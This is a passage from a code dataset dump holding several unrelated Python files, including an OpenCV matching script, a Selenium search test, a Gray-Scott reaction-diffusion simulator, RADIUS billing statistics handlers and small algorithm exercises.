(src_pts[0],dst_pts[0])\n #a = src_pts[0]\n #b = dst_pts[0]\n #c = np.sqrt(np.sum(np.square(a - b) \n b = len(dst_pts)\n sum = 0\n j = 0\n src_sub_a = []\n dst_sub_a = []\n jilushuzu = []\n for i in range(0,b):\n dist = np.linalg.norm(src_pts[i] - dst_pts[i])\n jilushuzu.append(dist)\n a = (len(jilushuzu))\n #print (jilushuzu)\n #print (jilushuzu)\n for i in jilushuzu:\n sum = sum + i\n a = sum/a\n\n for i in range(0,b):\n dist = np.linalg.norm(src_pts[i] - dst_pts[i])\n if dist > 1.4*a:\n src_sub_a.append(src_pts[i])\n dst_sub_a.append(dst_pts[i])\n\n #print (src_sub_a ,dst_sub_a)\n cv2.polylines(img1,[np.int32(src_sub_a)],True,(0,255,0),3, cv2.LINE_AA)\n cv2.polylines(canvas,[np.int32(dst_sub_a)],True,(0,0,255),3, cv2.LINE_AA)\n matched = np.hstack((img1, canvas)) # 组合在一起 \n\n cv2.imwrite(\"matched7.png\", matched)\n\n win = cv2.namedWindow('test win2', flags=0)\n\n cv2.imshow('test win2', matched)\n cv2.waitKey();\n cv2.destroyAllWindows()\nelse:\n print( \"Not enough matches are found - \".format(len(good),MIN_MATCH_COUNT))","sub_path":"求平均距离后比较.py","file_name":"求平均距离后比较.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"46050460","text":"def maccarthy91(n):\n k = 1\n while k:\n if n > 100:\n n -= 10\n k -= 1\n else:\n n += 11\n k += 1\n return n\n\ndef maccarthy91_rec(n):\n if n > 100:\n return n - 10\n else:\n return maccarthy91_rec(maccarthy91_rec(n+11))\n\nprint(maccarthy91(80))\nprint(maccarthy91(110))\n","sub_path":"100days_algorithm/day11_mccarthy91.py","file_name":"day11_mccarthy91.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"161680726","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(4)\ndriver.get('https://www.amazon.com/')\n\nsearch_field = driver.find_element(By.ID, 'twotabsearchtextbox')\nsearch_field.send_keys('Watches')\n\nsearch_icon = driver.find_element(By.ID, 'nav-search-submit-button')\nsearch_icon.click()\n\nactual_text = driver.find_element(By.XPATH, \"//span[@class='a-color-state a-text-bold']\").text\nexpected_text = '\"Watches\"'\n\nassert expected_text == actual_text, f'Expected {expected_text}, but got {actual_text}'\ndriver.quit()\n","sub_path":"amazon_script.py","file_name":"amazon_script.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"138163993","text":"from requests import get\nimport pytz\nfrom time import strftime\nfrom datetime import datetime\n\n\nNIGHT_BEGINNING = 0\nNIGHT_ENDING = 7\n\n\ndef load_data_from_page(page_number):\n parameters = {\n 'page': page_number\n }\n \n api_url = 'http://devman.org/api/challenges/solution_attempts/'\n \n response = get(url=api_url, params=parameters)\n \n return response.json()\n\n\ndef load_attempts():\n page_data = load_data_from_page(1) # load first time to find number of pages\n \n pages = page_data['number_of_pages']\n\n for peace in page_data['records']:\n yield {\n 'username': peace['username'],\n 'timestamp': peace['timestamp'],\n 'timezone': peace['timezone'],\n }\n \n for page in range(1, pages): # already got info from first (0) page\n page_data = load_data_from_page(page+1)\n for peace in page_data['records']:\n yield {\n 'username': peace['username'],\n 'timestamp': peace['timestamp'],\n 'timezone': peace['timezone'],\n }\n\n\ndef get_midnighters(list_of_users):\n for user in list_of_users:\n timezone = pytz.timezone(user['timezone'])\n if user['timestamp'] is None:\n continue\n user_time = datetime.fromtimestamp(user['timestamp'], timezone)\n if NIGHT_BEGINNING < user_time.hour < NIGHT_ENDING:\n yield {\n 'username': user['username'],\n 'time': strftime('%H:%M:%S', datetime.timetuple(datetime.fromtimestamp(user['timestamp'], timezone)))\n }\n\nif __name__ == '__main__':\n for user in get_midnighters(load_attempts()):\n print(user['time'], user['username'])\n","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"542407649","text":"# pylint: disable=unused-argument\n# pylint: disable=redefined-builtin\n\n\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nReaction-Diffusion Simulation with Pyglet and GLSL\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nUsage: python main.py\n\nFor how to use mouse and keyboard to play with the simulation see the doc below.\n\n:copyright (c) 2017 by Zhao Liang.\n\"\"\"\n\nimport os, shutil\n\nif os.path.exists('frames'):\n shutil.rmtree('frames')\nos.makedirs('frames')\n\nimport json\nimport numpy as np\n\ntry:\n raw_input\nexcept NameError:\n raw_input = input\n\nimport pyglet\npyglet.options['debug_gl'] = False\nimport pyglet.gl as gl\n\nfrom PIL import Image\nfrom shader import Shader\nfrom framebuffer import FrameBuffer\n\n\n# pattern: [rU, rV, feed, kill]\nSPECIES = {'bacteria1': [0.16, 0.08, 0.035, 0.065],\n 'bacteria2': [0.14, 0.06, 0.035, 0.065],\n 'coral': [0.16, 0.08, 0.060, 0.062],\n 'fingerprint': [0.19, 0.05, 0.060, 0.062],\n 'spirals': [0.10, 0.10, 0.018, 0.050],\n 'spirals_dense': [0.12, 0.08, 0.020, 0.050],\n 'spirals_fast': [0.10, 0.16, 0.020, 0.050],\n 'unstable': [0.2097, 0.105, 0.018, 0.051],\n 'net': [0.2097, 0.105, 0.039, 0.058],\n 'worms1': [0.16, 0.08, 0.050, 0.065],\n 'worms2': [0.16, 0.08, 0.054, 0.063],\n 'zebrafish': [0.16, 0.08, 0.035, 0.060],}\n\n\ndef create_texture_from_array(array):\n \"\"\"Create a pyglet texture instance from a numpy ndarray.\"\"\"\n height, width = array.shape[:2]\n texture = pyglet.image.Texture.create_for_size(gl.GL_TEXTURE_2D, width, height, gl.GL_RGBA32F_ARB)\n gl.glBindTexture(texture.target, texture.id)\n gl.glTexImage2D(texture.target, texture.level, gl.GL_RGBA32F_ARB,\n width, height, 0, gl.GL_RGBA, gl.GL_FLOAT, array.ctypes.data)\n gl.glBindTexture(texture.target, 0)\n return texture\n\n\nclass GrayScott(pyglet.window.Window):\n \"\"\"\n ----------------------------------------------------------\n | This simulation uses mouse and keyboard to control the |\n | patterns and colors. At any time you may click or drag |\n | your mouse to draw on the screen. |\n | |\n | Keyboard control: |\n | 1. press 'space' to clear the window to blank. |\n | 2. press 'p' to change to a random palette. |\n | 3. press 's' to change to another pattern. |\n | 4. press 'Ctrl + s' to save current config. |\n | 5. press 'Ctrl + o' to load config from json file. |\n | 6. press 'Enter' to take screenshots. |\n | 7. press 'Ctrl + v' to start saving frames and press |\n | 'Ctrl + v' again to stop saving frames. |\n | 8. press 'Esc' to exit. |\n ----------------------------------------------------------\n \"\"\"\n \n def __init__(self, width, height, scale, config, video=False, mask=None, flip=False):\n \"\"\"\n width, height: size of the window in pixels.\n scale: the size of the texture is (width//scale) x (height//scale).\n config: a line number in the file `config.json`.\n video: whether or not saving frams from the beginning.\n mask: a user-defined image that will be converted to a white and black mask image.\n filp: choose whether the black pixels or the white pixels in the mask image are shown.\n \"\"\"\n pyglet.window.Window.__init__(self, width, height, caption='GrayScott Simulation',\n resizable=True, visible=False, vsync=False)\n self.tex_width, self.tex_height = width // scale, height // scale\n self.load_config(config)\n \n # Choose which reaction shader to use according to whether there is a mask image.\n if mask is None:\n self.reaction_shader = Shader('./glsl/default.vert', './glsl/reaction.frag') \n self.mask_texture = None\n else:\n self.reaction_shader = Shader('./glsl/default.vert', './glsl/reaction_with_mask.frag')\n img = Image.open(mask).convert('L').resize((self.tex_width, self.tex_height))\n img = (np.asarray(img) / 255.0).astype(np.float32)\n mask_texture = np.zeros(img.shape+(4,), dtype=np.float32)\n if flip:\n mask_texture[:, :, 0] = img[::-1]\n else:\n mask_texture[:, :, 0] = 1 - img[::-1]\n self.mask_texture = create_texture_from_array(mask_texture)\n \n self.render_shader = Shader('./glsl/default.vert', './glsl/render.frag')\n \n # Genetate the uv_texture\n uv_grid = np.zeros((self.tex_height, self.tex_width, 4), dtype=np.float32)\n uv_grid[:, :, 0] = 1.0\n\n if self.mask_texture is None:\n # start evovling from the center.\n uv_grid[self.tex_height//2, self.tex_width//2, 1] = 1.0\n else:\n # start evovling from 10 random points.\n rand_rows = np.random.choice(range(self.tex_height), 10)\n rand_cols = np.random.choice(range(self.tex_width), 10)\n uv_grid[rand_rows, rand_cols, 1] = 1.0\n self.uv_texture = create_texture_from_array(uv_grid)\n \n # Bind the (one or two) texture(s).\n gl.glActiveTexture(gl.GL_TEXTURE0)\n gl.glBindTexture(self.uv_texture.target, self.uv_texture.id)\n if self.mask_texture is not None:\n gl.glActiveTexture(gl.GL_TEXTURE1)\n gl.glBindTexture(self.mask_texture.target, self.mask_texture.id)\n \n # Use an invisible buffer to do the computation.\n with FrameBuffer() as self.fbo:\n self.fbo.attach_texture(self.uv_texture)\n\n self.mouse_down = False\n self._species_names = list(SPECIES.keys())\n\n # The next four attributes are used for saving frames.\n self.frame_count = 0\n self.video_on = video\n self.skip = 100\n self.max_frames = 100000\n\n # Finally initialize the two shaders.\n self.init_reaction_shader()\n self.init_render_shader()\n\n \n def load_config(self, config=None):\n \"\"\"Load a config from the json file.\"\"\"\n if config is None:\n try:\n config = int(raw_input('> Enter the line number in json file: ').strip())\n except ValueError:\n print('> Invalid input.\\n')\n return\n\n with open('config.json', 'r') as f:\n lines = f.readlines()\n if 1 <= config <= len(lines):\n (pattern, palette), = json.loads(lines[config - 1]).items()\n self.pattern = pattern\n self.palette = palette\n print('> Config loaded. Current config: ' + self.pattern + '. Draw on it!\\n')\n else:\n print('> Config does not exist in json file.\\n')\n \n \n def init_reaction_shader(self):\n with self.reaction_shader:\n self.reaction_shader.set_uniformi('uv_texture', 0)\n if self.mask_texture is not None:\n self.reaction_shader.set_uniformi('mask_texture', 1)\n self.reaction_shader.set_uniformf('dx', 1.0/self.tex_width)\n self.reaction_shader.set_uniformf('dy', 1.0/self.tex_height)\n # the order of the vertices and texcoords matters,\n # since we will call 'GL_TRIANGLE_STRIP' to draw them.\n self.reaction_shader.set_vertex_attrib('position', [-1, -1, 1, -1, -1, 1, 1, 1])\n self.reaction_shader.set_vertex_attrib('texcoord', [0, 0, 1, 0, 0, 1, 1, 1])\n self.reaction_shader.set_uniformf('u_mouse', -1, -1)\n self.use_pattern(self.pattern)\n \n \n def init_render_shader(self):\n with self.render_shader:\n self.render_shader.set_uniformi('uv_texture', 0)\n self.render_shader.set_vertex_attrib('position', [-1, -1, 1, -1, -1, 1, 1, 1])\n self.render_shader.set_vertex_attrib('texcoord', [0, 0, 1, 0, 0, 1, 1, 1])\n self.use_palette(self.palette)\n \n \n def use_pattern(self, pattern):\n rU, rV, feed, kill = SPECIES[pattern]\n with self.reaction_shader:\n self.reaction_shader.set_uniformf('feed', feed)\n self.reaction_shader.set_uniformf('kill', kill)\n self.reaction_shader.set_uniformf('rU', rU)\n self.reaction_shader.set_uniformf('rV', rV)\n \n \n def use_palette(self, palette):\n color1, color2, color3, color4, color5 = palette\n with self.render_shader:\n self.render_shader.set_uniformf('color1', *color1)\n self.render_shader.set_uniformf('color2', *color2)\n self.render_shader.set_uniformf('color3', *color3)\n self.render_shader.set_uniformf('color4', *color4)\n self.render_shader.set_uniformf('color5', *color5)\n \n \n def set_viewport(self, width, height):\n gl.glViewport(0, 0, width, height)\n gl.glMatrixMode(gl.GL_PROJECTION)\n gl.glLoadIdentity()\n gl.glOrtho(0, 1, 0, 1, -1, 1)\n gl.glMatrixMode(gl.GL_MODELVIEW)\n \n \n def on_draw(self):\n gl.glClearColor(0, 0, 0, 0)\n self.clear()\n\n # Since we are rendering to the invisible framebuffer,\n # the size is the texture's size.\n self.set_viewport(self.tex_width, self.tex_height)\n\n with self.fbo:\n with self.reaction_shader:\n gl.glDrawArrays(gl.GL_TRIANGLE_STRIP, 0, 4)\n\n # Now we render to the actual window, hence the size is window's size.\n self.set_viewport(self.width, self.height)\n with self.render_shader:\n gl.glDrawArrays(gl.GL_TRIANGLE_STRIP, 0, 4)\n \n if self.video_on:\n if (self.frame_count % self.skip == 0) and (self.frame_count < self.max_frames):\n self.save_video_frame(self.frame_count // self.skip)\n\n self.frame_count += 1\n \n \n def save_video_frame(self, index):\n img = pyglet.image.get_buffer_manager().get_color_buffer()\n img.save(os.path.join('frames', 'frame{:05d}.png'.format(index)))\n \n \n def update_mouse(self, *u_mouse):\n self.set_viewport(self.tex_width, self.tex_height)\n with self.fbo:\n with self.reaction_shader:\n self.reaction_shader.set_uniformf('u_mouse', *u_mouse)\n \n \n def on_mouse_press(self, x, y, button, modifiers):\n self.mouse_down = True\n bx = x / float(self.width)\n by = y / float(self.height)\n self.update_mouse(bx, by)\n\n\n def on_mouse_release(self, x, y, button, modifiers):\n self.mouse_down = False\n self.update_mouse(-1, -1)\n\n\n def on_mouse_drag(self, x, y, dx, dy, button, modifiers):\n if self.mouse_down:\n bx = x / float(self.width)\n by = y / float(self.height)\n self.update_mouse(bx, by)\n\n \n def on_key_press(self, symbol, modifiers):\n if symbol == pyglet.window.key.ENTER:\n self.save_screenshot()\n \n if symbol == pyglet.window.key.ESCAPE:\n pyglet.app.exit()\n \n # clear to blank window\n if symbol == pyglet.window.key.SPACE:\n self.update_mouse(-10, -10)\n \n if symbol == pyglet.window.key.S and not modifiers:\n self.change_pattern()\n\n if symbol == pyglet.window.key.P:\n self.change_palette()\n\n if symbol == pyglet.window.key.S:\n if modifiers & pyglet.window.key.LCTRL:\n self.save_config()\n\n if symbol == pyglet.window.key.O:\n if modifiers & pyglet.window.key.LCTRL:\n self.load_config()\n self.use_palette(self.palette)\n self.use_pattern(self.pattern)\n \n if symbol == pyglet.window.key.V:\n if modifiers & pyglet.window.key.LCTRL:\n self.switch_video_stats()\n \n \n def save_screenshot(self):\n index = np.random.randint(0, 1000)\n img = pyglet.image.get_buffer_manager().get_color_buffer()\n img.save('screenshot{:05d}.png'.format(index))\n \n \n def save_config(self):\n \"\"\"Save current config to the json file.\"\"\"\n with open('config.json', 'a+') as f:\n data = json.dumps({self.pattern: self.palette.tolist()})\n f.write(data + '\\n')\n print('> Config saved.\\n')\n \n \n def change_palette(self):\n \"\"\"Use a random palette.\"\"\"\n alphas = sorted(np.random.random(5))\n palette = np.random.random((5, 4))\n # The first row is set to 0 to make the background black.\n palette[0] = 0.0\n palette[:, -1] = alphas\n palette = palette.round(3)\n self.use_palette(palette)\n self.palette = palette\n print('> Current palette: ')\n print(palette)\n print('\\n')\n\n \n def change_pattern(self):\n \"\"\"Use the next pattern in the list `_species_names`.\"\"\"\n index = self._species_names.index(self.pattern)\n next_pattern = self._species_names[(index + 1) % len(self._species_names)]\n self.use_pattern(next_pattern)\n self.pattern = next_pattern\n print('> Current pattern: ' + self.pattern\n + '. If the screen is blank, draw on it!\\n')\n \n \n def switch_video_stats(self):\n self.video_on = not self.video_on\n if self.video_on:\n print('start saving frames ...')\n else:\n print('stop saving frames ...')\n self.frame_count = 0\n \n \n def run(self, fps=None):\n \"\"\"fps: frames per second.\"\"\"\n self.set_visible(True)\n if fps is None:\n pyglet.clock.schedule(lambda dt: None)\n else:\n pyglet.clock.schedule_interval(lambda dt: None, 1.0/fps)\n pyglet.app.run()\n \n\nif __name__ == '__main__':\n app = GrayScott(width=500, height=500, scale=1, config=1,\n video=False, mask='lena.jpg', flip=True)\n print(app.__doc__)\n app.run(fps=None) # use max fps.\n","sub_path":"src/grayscott/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"517233292","text":"import random\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom Fitness import Fitness\n\n\nclass PCBPrinter:\n\n def __init__(self, population):\n self.__population = population\n self.__pcb = population.individuals[0].pcb\n\n @property\n def population(self):\n return self.__population\n\n @population.setter\n def population(self, population):\n self.__population = population\n\n @property\n def pcb(self):\n return self.__pcb\n\n @pcb.setter\n def pcb(self, pcb):\n self.__pcb = pcb\n\n def draw_plot(self, individual):\n plt.clf()\n # FRAME\n x_frame = np.array([0, 0, self.pcb.width, self.pcb.width, 0])\n y_frame = np.array([0, self.pcb.height, self.pcb.height, 0, 0])\n plt.plot(x_frame, y_frame, linestyle='dashed')\n\n # TITLE\n title_font = {'family': 'serif', 'size': 16}\n plt.title(\"BEST INDIVIDUAL\", fontdict=title_font)\n\n for path in individual.paths:\n\n rand_color = \"#%06x\" % random.randint(0, 0xFFFFFF)\n\n # START & END POINT\n start = path.link.start_point\n end = path.link.end_point\n plt.plot([start.x], [start.y], marker='o', color=rand_color, ms=10)\n plt.plot([end.x], [end.y], marker='x', color=rand_color, ms=10)\n\n # SEGMENTS\n x_segments = [path.segments[0].start_point.x]\n y_segments = [path.segments[0].start_point.y]\n\n for segment in path.segments:\n x_segments.append(segment.end_point.x)\n y_segments.append(segment.end_point.y)\n\n plt.plot(x_segments, y_segments, color=rand_color)\n\n fit = Fitness(individual)\n fitness = fit.count_fitness()\n ind_info = fit.get_info()\n\n plt.figtext(0.2, 0, 'Length: ' + str(ind_info[0]) + ' Segments: '\n + str(ind_info[1]) + ' Crosses: ' + str(ind_info[2])\n + ' Fitness: ' + str(fitness) + '\\nPaths out of board: ' + str(ind_info[3]) + ' Length out of board: ' + str(ind_info[4]))\n\n plt.grid()\n plt.draw()\n plt.waitforbuttonpress(0)\n","sub_path":"PCBPrinter.py","file_name":"PCBPrinter.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"425259841","text":"from .basepageobj import myui,by\nfrom rundata.mydata import MyData\nimport logging\n\n\nclass Contact(myui):\n \"\"\"联系人类,联系人应用的操作全在此类中实现,实例化时需要传入driver\"\"\"\n\n def __init__(self,driver):\n self.driver = driver\n self.conf = MyData().get_element_data('contact')\n\n def input_contact_msg(self):\n \"\"\"输入联系人名称\"\"\"\n ine = self.driver.find_element(by.ID, self.conf['in_name_f_id'])\n conteactName = ine.find_elements_by_class_name(self.conf['in_classes'])\n conteactName[0].send_keys('test')\n conteactName[1].send_keys('test')\n\n def new_contact(self):\n \"\"\"新建联系人\"\"\"\n self.driver.find_element(by.ID, self.conf['skip_id']).click()\n self.driver.find_element(by.ID,self.conf['add_id']).click()\n self.input_contact_msg()\n self.driver.find_element(by.ID, self.conf['save_id']).click()\n logging.info('已点击保存')\n text = self.driver.toast(\"已保存\")\n logging.info(text)\n assert '已保存' in text\n\n def del_contact(self):\n \"\"\"\n 删除联系人\n \"\"\"\n self.driver.find_element(by.ID, self.conf['skip_id']).click()\n e = self.driver.find_elements(by.ID,self.conf['ck_id'])\n #判断是否有联系人\n if len(e)==0:\n logging.info('no contact,please add')\n assert False\n else:\n e[0].click()\n self.driver.find_elements(by.CLASSNAME,self.conf['more_class'])[1].click()\n self.driver.find_element(by.TEXT,'删除').click()\n self.driver.find_element(by.ID, self.conf['is_id']).click()\n text = self.driver.toast(\"已删除\")\n logging.info(text)\n assert '已删除' in text","sub_path":"base/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"63596669","text":"#!/usr/bin/env python\n# coding=utf-8\nimport decimal\nimport datetime\nfrom sqlalchemy import func\nfrom tablib import Dataset\nfrom taurusxradius.modules import models\nfrom taurusxradius.modules.customer import customer_forms\nfrom taurusxradius.modules.base import BaseHandler, authenticated\nfrom taurusxradius.taurusxlib.permit import permit\nfrom taurusxradius.taurusxlib import utils\nfrom taurusxradius.modules.settings import *\n\n@permit.suproute('/admin/stat/income/month', u'营业月统计', MenuStat, order=1.00002, is_menu=True)\n\nclass IncomeMonthStatHandler(BaseHandler):\n\n @authenticated\n def get(self):\n self.post()\n\n @authenticated\n def post(self):\n node_id = self.get_argument('node_id', None)\n product_id = self.get_argument('product_id', None)\n operator_name = self.get_argument('operator_name', None)\n query_begin_time = self.get_argument('query_begin_time', None)\n query_end_time = self.get_argument('query_end_time', None)\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n opr_nodes = self.get_opr_nodes()\n opr_products = self.get_opr_products()\n _query = self.db.query(models.TrCustomer.node_id, models.TrNode.node_name, models.TrCustomerOrder.product_id, models.TrProduct.product_name, models.TrAcceptLog.operator_name, func.sum(models.TrCustomerOrder.actual_fee).label('actual_fee'), func.count(models.TrCustomerOrder.order_id).label('dev_count'), models.TrCustomerOrder.stat_month).filter(models.TrCustomerOrder.product_id == models.TrProduct.id, models.TrCustomerOrder.customer_id == models.TrCustomer.customer_id, models.TrNode.id == models.TrCustomer.node_id, models.TrAcceptLog.id == models.TrCustomerOrder.accept_id)\n if node_id:\n _query = _query.filter(models.TrCustomer.node_id == node_id)\n else:\n _query = _query.filter(models.TrCustomer.node_id.in_([ i.id for i in opr_nodes ]))\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n if product_id:\n _query = _query.filter(models.TrCustomerOrder.product_id == product_id)\n if operator_name:\n _query = _query.filter(models.TrAcceptLog.operator_name == operator_name)\n if query_begin_time:\n _query = _query.filter(models.TrCustomerOrder.stat_month >= query_begin_time)\n if query_end_time:\n _query = _query.filter(models.TrCustomerOrder.stat_month <= query_end_time)\n _query = _query.group_by('stat_month', 'node_id', 'node_name', 'product_id', 'product_name', 'operator_name')\n _query = _query.order_by('stat_month')\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.actual_fee)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n if self.request.path == '/admin/stat/income/month':\n return self.render('income_month_stat.html', node_list=opr_nodes, fee_total=fee_total, dev_total=dev_total, products=opr_products, statitems=_query.limit(5000), **self.get_params())\n elif self.request.path == '/admin/stat/income/month/export':\n data = Dataset()\n data.append((u'月份', u'区域', u'资费', u'操作员', u'受理用户数', u'总金额'))\n _f2y = utils.fen2yuan\n for i in _query:\n data.append((i.stat_month,\n i.node_name,\n i.product_name,\n i.operator_name,\n i.dev_count,\n _f2y(i.actual_fee)))\n\n name = u'RADIUS-INCOME-MONTH-' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') + '.xls'\n return self.export_file(name, data)\n else:\n return\n\n\n@permit.suproute('/admin/stat/income/month/export', u'营业月统计导出', MenuStat, order=1.10001)\n\nclass IncomeMonthStatExportHandler(IncomeMonthStatHandler):\n pass\n\n\n@permit.suproute('/admin/stat/income/trend/month', u'运营分析-营收月趋势', MenuStat, order=5.0001)\n\nclass IncomeMonthTrendHandler(BaseHandler):\n\n @authenticated\n def get(self):\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n stat_month = self.get_argument('stat_month', utils.get_currdate()[0:7])\n _query = self.db.query(models.TrCustomerOrder.stat_day, func.sum(models.TrCustomerOrder.actual_fee).label('fee_value'), func.count(models.TrCustomerOrder.order_id).label('dev_count')).filter(models.TrCustomer.customer_id == models.TrCustomerOrder.customer_id, models.TrCustomerOrder.stat_month == stat_month, models.TrAcceptLog.id == models.TrCustomerOrder.accept_id)\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n _query = _query.group_by(models.TrCustomerOrder.stat_day)\n _query = _query.order_by(models.TrCustomerOrder.stat_day.asc())\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.fee_value)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n fee_data = [ (i.stat_day, float(utils.fen2yuan(i.fee_value))) for i in _query ]\n dev_data = [ (i.stat_day, float(i.dev_count)) for i in _query ]\n categories = [ i.stat_day for i in _query ]\n self.render_json(code=0, msg='ok', fee_data=fee_data, dev_data=dev_data, categories=categories, dev_total=int(dev_total), fee_total=utils.fen2yuan(fee_total))\n return\n\n\n@permit.suproute('/admin/stat/income/noderate/month', u'运营分析-区域营收比例(月)', MenuStat, order=5.0002)\n\nclass IncomeMonthNoderateHandler(BaseHandler):\n\n @authenticated\n def get(self):\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n stat_month = self.get_argument('stat_month', utils.get_currdate()[0:7])\n _query = self.db.query(models.TrNode.node_name, func.sum(models.TrCustomerOrder.actual_fee).label('fee_value'), func.count(models.TrCustomerOrder.order_id).label('dev_count')).filter(models.TrCustomer.customer_id == models.TrCustomerOrder.customer_id, models.TrNode.id == models.TrCustomer.node_id, models.TrCustomerOrder.stat_month == stat_month)\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n _query = _query.group_by(models.TrNode.node_name)\n _query = _query.order_by(models.TrNode.node_name.asc())\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.fee_value)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n fee_data = [ {'name': i.node_name,\n 'y': float(utils.fen2yuan(i.fee_value))} for i in _query ]\n dev_data = [ {'name': i.node_name,\n 'y': float(i.dev_count)} for i in _query ]\n self.render_json(code=0, msg='ok', fee_data=fee_data, dev_data=dev_data, dev_total=int(dev_total), fee_total=utils.fen2yuan(fee_total))\n return\n\n\n@permit.suproute('/admin/stat/income/productrate/month', u'运营分析-资费营收比例(月)', MenuStat, order=5.0002)\n\nclass IncomeMonthProductRateHandler(BaseHandler):\n\n @authenticated\n def get(self):\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n stat_month = self.get_argument('stat_month', utils.get_currdate()[0:7])\n _query = self.db.query(models.TrProduct.product_name, func.sum(models.TrCustomerOrder.actual_fee).label('fee_value'), func.count(models.TrCustomerOrder.order_id).label('dev_count')).filter(models.TrCustomer.customer_id == models.TrCustomerOrder.customer_id, models.TrProduct.id == models.TrCustomerOrder.product_id, models.TrCustomerOrder.stat_month == stat_month)\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n _query = _query.group_by(models.TrProduct.product_name)\n _query = _query.order_by(models.TrProduct.product_name.asc())\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.fee_value)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n fee_data = [ {'name': i.product_name,\n 'y': float(utils.fen2yuan(i.fee_value))} for i in _query ]\n dev_data = [ {'name': i.product_name,\n 'y': float(i.dev_count)} for i in _query ]\n self.render_json(code=0, msg='ok', fee_data=fee_data, dev_data=dev_data, dev_total=int(dev_total), fee_total=utils.fen2yuan(fee_total))\n return\n\n@permit.suproute('/admin/stat/income/oprrate/month', u'运营分析-操作员营收比例(月)', MenuStat, order=5.0003)\n\nclass IncomeMonthOprRateHandler(BaseHandler):\n\n @authenticated\n def get(self):\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n stat_month = self.get_argument('stat_month', utils.get_currdate()[0:7])\n _query = self.db.query(models.TrAcceptLog.operator_name, func.sum(models.TrCustomerOrder.actual_fee).label('fee_value'), func.count(models.TrCustomerOrder.order_id).label('dev_count')).filter(models.TrCustomer.customer_id == models.TrCustomerOrder.customer_id, models.TrAcceptLog.id == models.TrCustomerOrder.accept_id, models.TrCustomerOrder.stat_month == stat_month)\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n _query = _query.group_by(models.TrAcceptLog.operator_name)\n _query = _query.order_by(models.TrAcceptLog.operator_name.asc())\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.fee_value)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n fee_data = [ {'name': i.operator_name,\n 'y': float(utils.fen2yuan(i.fee_value))} for i in _query ]\n dev_data = [ {'name': i.operator_name,\n 'y': float(i.dev_count)} for i in _query ]\n self.render_json(code=0, msg='ok', fee_data=fee_data, dev_data=dev_data, dev_total=int(dev_total), fee_total=utils.fen2yuan(fee_total))\n return","sub_path":"taurusxradius/modules/busstat/income_month.py","file_name":"income_month.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"316286498","text":"'''\nTime: O(M + N)\nSpace: O(1)\n\nYou are here!\nYour runtime beats 13.55 % of python submissions.\nYou are here!\nYour memory usage beats 44.46 % of python submissions.\n'''\n\n\nclass Solution(object):\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: None Do not return anything, modify nums1 in-place instead.\n \"\"\"\n # process from end directly\n i, j = m - 1, n - 1\n idx = m + n - 1\n while i >= 0 and j >= 0:\n if nums1[i] > nums2[j]:\n nums1[idx] = nums1[i]\n i -= 1\n else:\n nums1[idx] = nums2[j]\n j -= 1\n idx -= 1\n \n # if j not reach 0\n 